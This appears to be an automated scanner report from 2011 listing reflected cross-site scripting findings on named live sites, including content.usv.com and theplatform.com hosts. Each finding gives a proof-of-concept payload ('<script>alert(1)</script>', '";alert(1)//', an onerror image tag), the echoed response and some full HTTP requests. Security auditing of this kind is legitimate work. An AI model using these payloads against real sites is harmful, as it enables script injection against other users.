...[SNIP]... xt/javascript"> var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"}; (function(){ function loadChartbeat() { window._sf_endpt=(new Date()).getTime(); _sf_async_config.path = "/pages6003a";alert(1)//90e08d69bc0/bug-labs"; var e = document.createElement('script'); e.setAttribute('language', 'javascript'); e.setAttribute('type', 'text/javascript'); e.setAttribute('src', (("https:" == document.loca ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c198e"><script>alert(1)</script>7641f5bdca4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:44:58 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31838 Date: Wed, 05 Oct 2011 20:44:58 GMT X-Varnish: 1169901890 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... ;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesc198e"><script>alert(1)</script>7641f5bdca4/bug-labs%0AServer: content.usv.com%0APath: /pagesc198e"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74aae"%3balert(1)//4ca3695d6d4 was submitted in the REST URL parameter 1. This input was echoed as 74aae";alert(1)//4ca3695d6d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:17 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31723 Date: Wed, 05 Oct 2011 20:45:17 GMT X-Varnish: 1169903850 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... xt/javascript"> var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"}; (function(){ function loadChartbeat() { window._sf_endpt=(new Date()).getTime(); _sf_async_config.path = "/pages74aae";alert(1)//4ca3695d6d4/canvas"; var e = document.createElement('script'); e.setAttribute('language', 'javascript'); e.setAttribute('type', 'text/javascript'); e.setAttribute('src', (("https:" == document.locati ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72f0f"><script>alert(1)</script>d3ee7e4f618 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:15 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31828 Date: Wed, 05 Oct 2011 20:45:16 GMT X-Varnish: 1169903748 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... ;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pages72f0f"><script>alert(1)</script>d3ee7e4f618/canvas%0AServer: content.usv.com%0APath: /pages72f0f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1265d"%3balert(1)//705653a3bf2 was submitted in the REST URL parameter 1. This input was echoed as 1265d";alert(1)//705653a3bf2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:04:16 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31733 Date: Wed, 05 Oct 2011 21:04:16 GMT X-Varnish: 650529180 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... xt/javascript"> var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"}; (function(){ function loadChartbeat() { window._sf_endpt=(new Date()).getTime(); _sf_async_config.path = "/pages1265d";alert(1)//705653a3bf2/covestor"; var e = document.createElement('script'); e.setAttribute('language', 'javascript'); e.setAttribute('type', 'text/javascript'); e.setAttribute('src', (("https:" == document.loca ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a68"><script>alert(1)</script>a29211bf554 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:04:15 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31838 Date: Wed, 05 Oct 2011 21:04:15 GMT X-Varnish: 650529093 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... ;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesc4a68"><script>alert(1)</script>a29211bf554/covestor%0AServer: content.usv.com%0APath: /pagesc4a68"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c83f9"%3balert(1)//97441585075 was submitted in the REST URL parameter 1. This input was echoed as c83f9";alert(1)//97441585075 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=af1fbe8bce28ace8e37c4e3b99d9c1c5; path=/; expires=Thu, 06-Oct-2011 21:19:49 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31724 Date: Wed, 05 Oct 2011 21:19:49 GMT X-Varnish: 650612289 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... xt/javascript"> var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"}; (function(){ function loadChartbeat() { window._sf_endpt=(new Date()).getTime(); _sf_async_config.path = "/pagesc83f9";alert(1)//97441585075/gary-chou"; var e = document.createElement('script'); e.setAttribute('language', 'javascript'); e.setAttribute('type', 'text/javascript'); e.setAttribute('src', (("https:" == document.loc ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f01f6"><script>alert(1)</script>63c7deabc70 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=af1fbe8bce28ace8e37c4e3b99d9c1c5; path=/; expires=Thu, 06-Oct-2011 21:19:48 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31829 Date: Wed, 05 Oct 2011 21:19:48 GMT X-Varnish: 650612225 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... ;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesf01f6"><script>alert(1)</script>63c7deabc70/gary-chou%0AServer: content.usv.com%0APath: /pagesf01f6"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6caad"><script>alert(1)</script>827854c5c88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:04:18 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31838 Date: Wed, 05 Oct 2011 21:04:18 GMT X-Varnish: 650529312 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... ;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pages6caad"><script>alert(1)</script>827854c5c88/hashable%0AServer: content.usv.com%0APath: /pages6caad"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f646"%3balert(1)//0778822b38e was submitted in the REST URL parameter 1. This input was echoed as 7f646";alert(1)//0778822b38e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:04:19 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31733 Date: Wed, 05 Oct 2011 21:04:19 GMT X-Varnish: 650529418 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... xt/javascript"> var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"}; (function(){ function loadChartbeat() { window._sf_endpt=(new Date()).getTime(); _sf_async_config.path = "/pages7f646";alert(1)//0778822b38e/hashable"; var e = document.createElement('script'); e.setAttribute('language', 'javascript'); e.setAttribute('type', 'text/javascript'); e.setAttribute('src', (("https:" == document.loca ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34dba"><script>alert(1)</script>1b2d7d1fc8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 20:43:28 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31849 Date: Wed, 05 Oct 2011 20:43:29 GMT X-Varnish: 1169892431 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... ;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pages34dba"><script>alert(1)</script>1b2d7d1fc8d/john-buttrick%0AServer: content.usv.com%0APath: /pages34dba"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82c12"%3balert(1)//83ae392392d was submitted in the REST URL parameter 1. This input was echoed as 82c12";alert(1)//83ae392392d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 20:43:29 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31744 Date: Wed, 05 Oct 2011 20:43:30 GMT X-Varnish: 1169892519 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... xt/javascript"> var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"}; (function(){ function loadChartbeat() { window._sf_endpt=(new Date()).getTime(); _sf_async_config.path = "/pages82c12";alert(1)//83ae392392d/john-buttrick"; var e = document.createElement('script'); e.setAttribute('language', 'javascript'); e.setAttribute('type', 'text/javascript'); e.setAttribute('src', (("https:" == document ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abd56"%3balert(1)//e892091a97f was submitted in the REST URL parameter 1. This input was echoed as abd56";alert(1)//e892091a97f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:28 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31743 Date: Wed, 05 Oct 2011 20:45:28 GMT X-Varnish: 1169905068 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... xt/javascript"> var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"}; (function(){ function loadChartbeat() { window._sf_endpt=(new Date()).getTime(); _sf_async_config.path = "/pagesabd56";alert(1)//e892091a97f/skillshare"; var e = document.createElement('script'); e.setAttribute('language', 'javascript'); e.setAttribute('type', 'text/javascript'); e.setAttribute('src', (("https:" == document.lo ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c34eb"><script>alert(1)</script>1f51c521a96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:27 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31848 Date: Wed, 05 Oct 2011 20:45:27 GMT X-Varnish: 1169904973 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... ;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesc34eb"><script>alert(1)</script>1f51c521a96/skillshare%0AServer: content.usv.com%0APath: /pagesc34eb"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb488"%3balert(1)//acae32804fb was submitted in the REST URL parameter 1. This input was echoed as bb488";alert(1)//acae32804fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:43 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31743 Date: Wed, 05 Oct 2011 20:45:43 GMT X-Varnish: 1169906638 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... xt/javascript"> var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"}; (function(){ function loadChartbeat() { window._sf_endpt=(new Date()).getTime(); _sf_async_config.path = "/pagesbb488";alert(1)//acae32804fb/soundcloud"; var e = document.createElement('script'); e.setAttribute('language', 'javascript'); e.setAttribute('type', 'text/javascript'); e.setAttribute('src', (("https:" == document.lo ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebd4d"><script>alert(1)</script>62f7eabc170 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Apache Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:43 GMT Content-Type: Text/HTML X-Magnify-URL-Class: modperl-nocache Content-Length: 31848 Date: Wed, 05 Oct 2011 20:45:43 GMT X-Varnish: 1169906556 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
...[SNIP]... ;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesebd4d"><script>alert(1)</script>62f7eabc170/soundcloud%0AServer: content.usv.com%0APath: /pagesebd4d"> ...[SNIP]...
The value of the renderedScripts request parameter is copied into the HTML document as plain text between tags. The payload 37013<img%20src%3da%20onerror%3dalert(1)>2052689086b was submitted in the renderedScripts parameter. This input was echoed as 37013<img src=a onerror=alert(1)>2052689086b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 385ba<script>alert(1)</script>b610dbcac07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: nginx/0.8.36 Content-Type: text/plain Status: 404 Not Found X-Runtime: 0.000775 Content-Length: 68 Date: Wed, 05 Oct 2011 21:12:03 GMT Connection: close
Not Found: /k385ba<script>alert(1)</script>b610dbcac07/qox0wee-e.css
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b2271<script>alert(1)</script>26bf83752ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: nginx/0.8.36 Content-Type: text/plain Status: 404 Not Found X-Runtime: 0.000767 Content-Length: 68 Date: Wed, 05 Oct 2011 21:12:06 GMT Connection: close
Not Found: /k/qox0wee-e.cssb2271<script>alert(1)</script>26bf83752ce
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9292'%3balert(1)//d530c4db51c was submitted in the mpck parameter. This input was echoed as f9292';alert(1)//d530c4db51c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2209"-alert(1)-"06eaa568993 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5a95"%3balert(1)//b3260482d6e was submitted in the mpvc parameter. This input was echoed as c5a95";alert(1)//b3260482d6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c6a0'%3balert(1)//30af109326a was submitted in the mpvc parameter. This input was echoed as 8c6a0';alert(1)//30af109326a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2cca'%3balert(1)//6164b81c3de was submitted in the mpck parameter. This input was echoed as a2cca';alert(1)//6164b81c3de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9c82"-alert(1)-"0bf514e8e3 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34070"%3balert(1)//d35023e459b was submitted in the mpvc parameter. This input was echoed as 34070";alert(1)//d35023e459b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de2b7'%3balert(1)//e1aee509765 was submitted in the mpvc parameter. This input was echoed as de2b7';alert(1)//e1aee509765 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9107<script>alert(1)</script>2a640559b36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /installers/mpxUploader.airc9107<script>alert(1)</script>2a640559b36 HTTP/1.1 Host: installer.mpx.theplatform.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Content-Length: 1432 Content-Type: text/html; charset=iso-8859-1 Server: Jetty(6.1.19) Expires: Wed, 05 Oct 2011 19:32:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 05 Oct 2011 19:32:24 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9c3ff<script>alert(1)</script>4fed174e67 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload ffca8<script>alert(1)</script>368431c84a6 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d6ab8<script>alert(1)</script>0822e901c54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.icod6ab8<script>alert(1)</script>0822e901c54 HTTP/1.1 Host: link.theplatform.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Response
HTTP/1.1 404 Not Found Date: Wed, 05 Oct 2011 19:17:50 GMT Content-Type: text/html; charset=iso-8859-1 Cache-Control: must-revalidate,no-cache,no-store Content-Length: 1417 Server: Jetty(6.1.19)
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8c409<script>alert(1)</script>e9cd2e257c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s8c409<script>alert(1)</script>e9cd2e257c/Xw6mu/CN1piYAIVAGNeopyg2Bq_XJHj3TmBn2b?mbr=true&format=SMIL&Tracking=true&Embedded=true HTTP/1.1 Host: link.theplatform.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.nbcnewyork.com/pdk442/pdk/swf/flvPlayer.swf Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Wed, 05 Oct 2011 18:22:06 GMT Content-Type: text/html; charset=iso-8859-1 Cache-Control: must-revalidate,no-cache,no-store Content-Length: 1445 Server: Jetty(6.1.19)
The value of the format request parameter is copied into the HTML document as plain text between tags. The payload e95c3<script>alert(1)</script>f28cf5071f0 was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/Xw6mu/CN1piYAIVAGNeopyg2Bq_XJHj3TmBn2b?mbr=true&format=SMILe95c3<script>alert(1)</script>f28cf5071f0&Tracking=true&Embedded=true HTTP/1.1 Host: link.theplatform.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.nbcnewyork.com/pdk442/pdk/swf/flvPlayer.swf Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 400 Bad Request Date: Wed, 05 Oct 2011 18:22:04 GMT Access-Control-Allow-Origin: * Cache-Control: no-cache, no-store Connection: close Server: Jetty(6.1.19)
